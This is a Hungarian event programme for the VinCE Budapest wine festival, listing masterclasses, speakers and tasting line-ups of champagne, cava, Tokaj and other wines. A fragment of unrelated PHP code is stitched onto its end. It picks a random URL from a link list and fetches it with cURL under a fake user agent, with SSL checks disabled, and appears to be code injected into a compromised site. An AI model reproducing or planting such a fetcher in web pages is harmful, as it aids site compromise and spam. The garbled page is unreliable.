Mesterkurzusok bővebbenSokkoló meglepetések a champagne- és pezsgő-világbajnokságon

Március 3., csütörtök, mesterkurzusterem, 13.00

Figyelem, fél órával korábban kezdődik! (A hosszú kóstolósor miatt…)

Előadó: Tom Stevenson és Márkus György

image.aspx

Tom Stevenson két éve megalapította a „pezsgők Oscarját”, Márkus György hazai borszakértő pedig a kezdetektől részt vesz az Egyesült Királyságban megrendezett versenyen. Stevensonék most a legutóbbi világbajnokság legnagyobb meglepetéseit hozzák el. Természetesen lesz champagne is (többek között a Lanson háztól), de olyan különlegességet is kóstolhatunk, mint a szerb Aleksandrović aranyérmes Trijumf pezsgője!

 

A kén száműzetése

Március 3., csütörtök, workshopterem, 13.30

Előadó: Olivier Pillet

A kén számüzetése-Olivier_PilletAz Institut Œnologique de Champagne (Champagne-i Önológiai Intézet) 1890 óta dolgozik a szőlőtől a palackozásig tartó folyamatokon. Az IOC csapata 31 borászból áll, hét laboratóriumuk működik, amelyek elemzéseket készítenek francia szőlészetek számára, de a világ más szőlőtermelő területein is jelen vannak. Ennek köszönhetően hihetetlenül széleskörű szakmai tapasztalatokra tettek szert a borkészítés területén, és szaktudásuk napról napra nő. Önológiai szakismereteik a borstílusok kialakításának egyik kulcsszereplőjévé tették a céget pezsgő és csendes borok készítésében. A VinCE workshopján azt mutatják meg, hogy a sok fogyasztó számára nem kívánatos kén mennyisége hogyan csökkenthető a borokban, természetesen gyakorlati példákon keresztül: olasz, francia és új-zélandi borokat mutat be Olivier Pillet, az önológus mérnök előadó.

 

Wine Star – a tehetségkutató

Március 3., csütörtök, mesterkurzusterem, 15.30

Előadók (zsűritagok): Caroline Gilby MW, Rod Smith MW, Maciej Wiczyński (lengyel borbeszerző), Rákóczi Ferenc, Gianni Annoni , Chris Boiling

EDITORIAL USE ONLY / NO MERCHANDISING / NO BOOK PUBLISHING Mandatory Credit: Photo by Ken McKay/REX Shutterstock (913802bb) Judges, Piers Morgan, Kelly Brook, Amanda Holden, Simon Cowell 'Britain's Got Talent' TV - April - 2009

Ma már tudjuk: nem elég, hogy egy bor jó, kell az a bizonyos X-faktor is, hogy kelendő legyen. Egy sztori a címke mögött, a borász elragadó személyisége, az extravagáns csomagolás, egy jó név. Boros tehetségkutatónkon lesz reflektorfény és dobpergés, tehetséges borászok és mindenre kész zsűri! 8 percet kap egy-egy versenyző, akinek a borát persze a zsűri mellett a közönség is kóstolhatja. A győztes mindenképp nyer egy pincelátogatás cikket a VinCE Magazinban, de a zsűri tagjainak személye okán további ajtók is megnyílhatnak!

 

A tökéletes borlap
Március 3., csütörtök, workshopterem, 15.30

Előadók: Nick Adams MW és Adam Pawłowski MS

A_tökéletes-borlap

Adott néhány ételtípus (sajt, csokoládé, libamájpástétom, füstölt lazac), és mellé egy borpár. Melyik lesz a befutó, és miért az? Egészen gyakorlati ismeretek azoknak, akik nem elégedettek éttermük borlapjával, vagy csak szeretnének az étel és bor párosítások mesterei lenni.

 


Gasztorkurzus – Fine dining, bisztró, street food – hazai borok minden fogás mellé!

GasztromesterkurzusMárcius 3., csütörtök, mesterkurzusterem, 17.30  Előadók: chefek és borszakértők Bernáth József, Forrai Miklós

Lehet, hogy csak itthon világhírűek a magyar borok – ahogy keserűen megjegyezzük időnként –, de hogy többre érdemesek, az bizonyos. Mesterkurzusunkon a magyar borok sokszínűségét mutatjuk be a legközérthetőbb nyelven: az étel-bor párosításokon keresztül.

 

Tokaji pezsgő – a borvidék harmadik dimenziója

Március 4., péntek, mesterkurzusterem, 9.30

Előadók: Káli Ildikó és Natasha Hughes MW

Szenzáció volt az első száraz tokaji furmintok megjelenése, most pedig tanúi lehetünk annak, hogy Tokaj „legújabb arca” láthatóvá válik. Egyre több tokaji pincészet kacérkodik a buborékokkal, és természetesen nem adják alább a champagne-i módszernél, sem minőségben, sem árban. Csodaszép reggelnek ígérkezik a hagyományos erjesztésű furmint pezsgők kóstolása!

 

veuve-clicquotChampagne Veuve Clicquot

Március 4., péntek, mesterkurzusterem, 11.30

Előadó: Nick Lane

A pezsgőház ikonikus cuvée-je, a La Grande Dame egy bátor ifjú hölgy, Madame Ponsardin előtt tiszteleg, aki 27 évesen, férje hirtelen halála miatt kénytelen volt átvenni a pezsgőház vezetését – egy olyan korban, amikor a nők nem vezettek még cégeket. Madame Ponsardin öröksége megmaradt, sőt mára a ház Champagne egyik legmeghatározóbb pezsgőháza. A jellegzetes narancssárga színbe öltöztetett pezsgők legjobbjait egyik borászuk mutatja be.

Borsor:

VCP Yellow Label
VCP Rosé NV
VCP Vintage 2008 Blanc 0,75 l
VCP Cave Privée Blanc 1989 1,5 l
VCP Cave Privée Rosé 1990 1,5 l
VCP La Grande Dame 2006 0,75l

 


Cavakurzus – a spanyol pezsgő
Március 4., péntek, mesterkurzusterem, 13.30

Előadók: Sarah Jane Evans MW, Pamela Anzano, Joan Parera, Víctor Bernabé, Bruno Colomer Marti, Herczeg Ágnes, Szeredi Zsolt

cavakurzus

Nem csak Champagne-ból érkeznek mesés pezsgők, a katalánok is híresen kiváló pezsgőket készítenek – ráadásul jóval alacsonyabb áron. A cavák sora:

– Anna de Codorníu Blanc de Blancs, Codorníu

– Elyssia Gran Cuvée, Freixenet

– Gran Juvé, Juvé y Camp

– Gran Claustro, Castillo Perelada

– Gran Reserva Barrica, Agustí Torello Mata

– La Vida al Camp cava brut, La Vida al Camp

– Gramona III Lustros Gran Reserva 2007

 

RhoneA Rhône-völgy borai
Március 4., péntek, mesterkurzusterem, 15.30

Előadó: Anne McHale MW

 

Jöjjön, és győződjön meg arról, hogy a Rhône van annyira nagyszerű, mint Franciaország más ikonikus borvidékei! Anne McHale Master of Wine szakértő végigkalauzolja a résztvevőket a Rhône-folyó mentén északról délre, hogy együtt fedezzük fel a folyót szegélyező appellációkat, szőlőskerteket. Megízlelhetjük kevéssé ismert fehér szőlőfajták borait, kóstolhatjuk az Észak-Rhône borsos karakterű syrah-it és a gazdag vörös házasításokat délről. Ez a mesterkurzus ragyogó bevezetés lesz a borvidék boraiba.

 

 


Szekszárd a palackban, avagy mit jelent ma a szekszárdi terroir és stílus?

Március 4., péntek, workshopterem, 15.30

Előadók: Elizabeth Gabay MW és Sebestyén Csilla AIWS

szekszardi_palack2
„Úgy hisszük, a Szekszárdi borvidék önállóságát, egyediségét a kiválasztott fajtákkal lehet megalapozni: a kadarka nagyon fontos lehetőséget jelent Szekszárdnak, kékfrankosban is kimagaslóan jók vagyunk, a Bikavér pedig évszázados hagyományokra épülő hungarikum. A szekszárdi palack nem csak egyfajta színpad a kiemelt fajtáinknak, hanem minőségi szűrő is egyben, valamint jól tükrözi, mit jelent ma a szekszárdi stílus.”

– Eszterbauer Borászat – Nagyapám Kadarka 2013

– Hetényi Pincészet – Kadarka 2013

– Tüske Pince – Kadarka 2013.

– Takler Borbirtok – Kékfrankos 2013.

– Dúzsi Tamás Pincéje – Kékfrankos 2012.

– Heimann Családi Birtok – Kékfrankos Alte Reben 2013.

– Sárosdi Pince – Kékfrankos 2012.

– Németh János Pincészet – Sygno Bikavér 2013.

– Schieber Pincészet – Bikavér 2013.

– Szent Gaál Kastély és Borház – Bikavér válogatás 2013.

– Lajvér Borház – Bikavér 2012.

– Sebestyén Pince – Iván-völgyi Bikavér 2012.

– Vida Családi Borbirtok – Bikavér 2012.

 

A nagy kihívás – a digitális vakteszt

Március 4., péntek, mesterkurzusterem, 17.30

Előadók: Caroline Gilby MW, Natasha Hughes MW, Anne McHale MW, Rod Smith MW, Romsics László

nagy_kihívás
A tavalyi sikerre való tekintettel idén is megrendezzük nagy digitális vaktesztünket, amelyen 12 bort kóstol az iPaddel felszerelt 200 vendég és öt szakértőnk. Mindenki értékeli a bort, és minden tétel után láthatóvá válik a közönség, illetve a szakértők átlagpontszáma – vagyis minden vendég azonnal megtudja, hogy saját értékelése hogyan viszonyul a többi borkedvelő és persze a szakértők pontszámához.

Idén is lesz bordeaux-i nagyágyú és újvilági divatbor – vajon ön felismeri, hogy melyik melyik?

 

Champagne mumChampagne Mumm

Március 5., szombat, mesterkurzusterem, 9.30

Előadó: Thomas Lignier

Az emblematikus vörös szalag minden vasárnap a Forma–1-es győztes kezében tűnt fel, a Mumm pezsgőház azonban sokkal több a száguldó cirkusz hivatalos italánál – főleg mert épp átnyergelnek az elektronikus autókat futtató Formula–E versenyre. A pezsgőház 200 hektárnyi premier cru vagy grand cru területtel rendelkezik Champagne-ban, a nem évjáratos Cordon Rouge készítéséhez 77 különböző terület borait házasítják.

Borsor:

Mumm Cordon Rouge
Mumm Vintage 2009
Mumm Blanc de Noirs
Mumm R. Lalou 2002
Mumm R. Lalou 1999 Magnum

 

 

wine _scienceWine Science – Hiszed vagy nem, természet és tudomány találkozása, avagy miért logikus a szőlő és a bor

Március 5., szombat, workshopterem, 9.30

Előadó: Herczeg Ágnes

Kézművesség? Tudomány? Hol a határ a beavatkozásoknál? Meddig természetes a manipuláció? Mi a terroir jelentősége, és meddig terjed a definíciója? Mennyit számít a csomagolás és a kommunikáció? Ezen a workshopon azt vizsgáljuk, hogy a tudomány hogyan függ össze a szőlővel és a borral – a telepítéstől egészen a borkóstolásig. Viszont a bonyolult kémiai képletek helyett most a meghökkentő és sokszor hihetetlen vitákat kiváltó kérdéseket fogjuk körbejárni szórakoztató módon, különböző borok kóstolásának segítségével.

 

 

Tokaj nemzetközi kontextusban
Március 5. szombat mesterkurzusterem 11:30
Moderátor: Dr. Fiáth Attila
Előadók: Caroline Gilby MW, Elizabeth Gabay MW, Nick Adams MW

tokaj

A Tokaj Kereskedőház teljes megújuláson megy keresztül napjainkban. A tudatos fejlesztéseknek köszönhetően nemrégiben remek száraz borokat ismerhettünk meg tőlük, és közeledik a Kereskedőház első “legújabbkori” aszúja is. Az állami tulajdonban lévő pincészet nem fél a kihívásoktól, sőt tisztában van velük, ezért merész mesterkurzusukon portfóliójuk egyik-másik tétele mellé nemzetközi példát állítanak – a három brit Master of Wine pedig segít abban, hogy a tokaji tételeket valóban nemzetközi kontextusban lássuk.

A borpárbajban részt vevő borok:

2014 Tokaji Sárgamuskotály félszáraz – welcome bor
2014 Tokaji Cuvée száraz  – Compania de Vinos Telmo Rodriguez Basa Blanco, 2014
2014 Tokaji Furmint száraz – Domane Wachau Neuburger Terrassen Spitz Sommelier Edition, 2014
2014 Tokaji Kõvágó Furmint –Frédéric Curis Pouilly-Fuissé Chardonnay Grand Vin De Bourgogne 2014
2013 Tokaji Késői Arany – Sablettes Sauternes, 2010
2013 Tokaji Aszú – Castelnau de Suduiraut, 2012 és Feiler-Artinger Ruster Ausbruch, 2013
2013 Tokaji Aszú Szarvas dűlő – a dűlős aszú
2013 Tokaji Essencia – a borok királya

 

Ornellaia, a toszkán ikon

Március 5., szombat, workshopterem, 11.30

Előadó: Axel Heinz

Ornellaia-1030x797

Olaszország legvonzóbb borvidéke, Toscana egyik legszebb gyöngyszeme az Ornellaia. A csúcsbirtok még soha nem tartott Magyarországon nyilvános kóstolót, nem csoda, hogy a 100 fős terem pillanatok alatt betelt, sőt a várólistán is jó néhány név szerepel már. A szerencsések, akik időben megvették a jegyüket, 6 tételt kóstolnak maga a borász, Axel Heinz bemutatásával.

 

Villányi és más franc-ok

Március 5., szombat, mesterkurzusterem, 13.30

Előadók: Anne-Charlotte Genet, Rod Smith MW, Yotam Sharon,
Győrffy Zoltán, Horkay András
Villányi-franc

A villányiak határozott célja, hogy a cabernet franc szó hallatán a világ minden pontján a Villányi Franc jusson a borértők eszébe. Mesterkurzusunkon külföldi példákat is teszünk a villányiak mellé, főleg azért, hogy elmerengjünk a szőlőfajta sokszínűségén, és azon is, hogy valóban otthonra lelt-e Villányban. A borsor:

– Clos de La Dioterie 2011, Domaine Charles Joguet, Loire, Franciaország

– Clos du Chêne Vert 2011, Domaine Charles Joguet, Loire, Franciaország

– Cabernet Franc 2013, Alona, Izrael

– Cabernet Franc 2013, Wassmann Pincészet, Villány

– Villányi Franc 2012, Bock Pince, Villány

– Villányi Franc 2012, Vylyan Pincészet, Villány

– Villányi Franc 2012, Gere-Weninger, Villány

– Cabernet Franc 2011, Sauska Pincészet, Villány

– Cabernet Franc 2011, Heumann Pincészet, Villány

– Cabernet Franc 2007, Malatinszky Kúria, Villány

 

 

Cave de TainCave de Tain l’Hermitage

Március 5., szombat, workshopterem, 13.30

Előadó: Xavier Gomart

A Cave de Tain l’Hermitage birtok a francia Rhône-völgy északi részén készíti a bort már négy emberöltő óta, 5 páratlan minőségű „cru”-n, vagyis magas besorolású területen a Crozes-Hermitage-ban, Saint-Joseph-ben, Saint-Péray-ben, Cornas-ban és a mitikus Hermitage-on. A borokat több mint 40 országba exportálják, és számos kiváló értékelést kaptak az amerikai Robert Parkertől és a brit Jancis Robinsontól egyaránt.

 

 

Chile, Santa Carolina

Március 5., szombat, mesterkurzusterem, 15.30

Előadó: José Andueza

chile

A Santa Carolina Chile egyik legrégebbi birtoka, Don Luis Pereyra 1875-ben alapította, és felesége tiszteletére nevezte el. Ma több mint 90 országba exportálnak, és hogy a több mint 125 éves tapasztalat a legújabb technikai tudással milyen remekül kiegészül, azt bizonyítja az is, hogy a Wine Enthusiast magazin 2015-ben a Santa Carolinát az év újvilági pincészetének választotta.

borsor:

Reserva Sauvignon Blanc

Gran Reserva Chardonnay

Reserva Merlot

Reserva De Familia Carmenere

Reserva De Familia Cabernet Sauvignon

VSC Assamblage

 

Washington sztárjai, avagy nem csak Kaliforniából jöhetnek jó borok

Március 5., szombat, workshopterem, 15.30

Előadó: Michael Schaefer, USA

 

washingtonAz Egyesült Államok bortermelése kapcsán elsőként Kalifornia jut eszünkbe, a kiműveltebb borisszák azonban tudják, hogy a nyugati part északabbra fekvő állama izgalmas és még felfedezésre váró borokat ad. Nem véletlen, hogy a német rizlingkirály, dr. Ernst Loosen is betársult itt egy borászatba, az alábbi első tétel ennek a közös vállalkozásnak a gyümölcse.

– Château Ste. Michelle Eroica Riesling, 2012

– Col Solare, 2012

– Hedges Family Red Mountain Syrah

– Hogue Cellars Genesis Syrah

– Château Ste. Michelle Cold Creek Cabernet Sauvignon

– Woodward Canyon Artist Series Cabernet Sauvignon

 

Nagy Sándor nyomában – Intrika és Invázió, Szenvedély és Bor

Március 5., szombat, mesterkurzusterem, 17.30

Előadók: Elizabeth Gabay MW, Caroline Gilby MW, Yotam Sharon, Darrel Joseph, Mustafa Camlica, Zorik Ghariban, Csizmadia-Honigh Péter

Mosaic of Alexander the Great

A történelem egyik legnagyobb alakja nagyon közel állt a borhoz: egész életében meglehetősen sok bort fogyasztott, sőt a halálát is mérgezett bor okozta. Nagy Sándor példátlan hírnevét igazolja, hogy a meghódított országokban máig őrzik az emlékét, még Alexandria nevű borászatot is ismerünk. A VinCE Budapest egyik legizgalmasabb mesterkurzusán Nagy Sándor útját követjük végig, természetesen borral. Elizabeth Gabay Master of Wine vezeti a mesterkurzust, ahol indiai, libanoni, izraeli, török, örmény, görög, ciprusi és makedón bort kóstolhatunk. Igazi kuriózum lesz az az izraeli bor, amely egy olyan ősi szőlőfajtából készült, amelyet helyi tudósok DNS-kísérletekkel rekonstruáltak, és a kutatások szerint elképzelhető, hogy Jézus is ezt a bort osztotta meg tanítványaival az utolsó vacsorán.

Borsor:

1, Israel Marawi 2014 (Ősi fehér fajta)

2, Turkey Camlica – Papaskarasi 2014

3, Cyprus, Petritis 2014 (Készült 100% Xynisteriból)

4, Greece Skouras Grand Nemea 2011

5, Ksara Single vineyard Chardonnay

6, Armenia Zorah Yeraz (Areni Noir) 2012

7, Israel Seahorse ‘Antoine’ 2013 Rhone blend

8, India: Grover Zampa Vineyards: Vijay Amritraj 2013

9, Republic of Macedonia: Barovo Tikves Winery 2012

 

Calvados Christian Drouin: a normandiai almapárlat örök élete

Március 5., szombat, workshopterem, 17.30

Előadó: Gauillaume Drouin

 

CalvadosA VinCE Magazin calvadostesztjén is remekelt az a családi főzde, amelynek örököse, a házasításért felelős Guillaume Drouin jön el Budapestre, hogy megkóstoltassa érlelt, hihetetlenül gazdag párlatait. Aki egyszer megkóstolja, örökre megszereti a calvadost! A kóstolandó tételek:

  • Blanche de Normandie
  • Selection
  • VSOP
  • XO.
  • Pierre Pivet X.O.

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>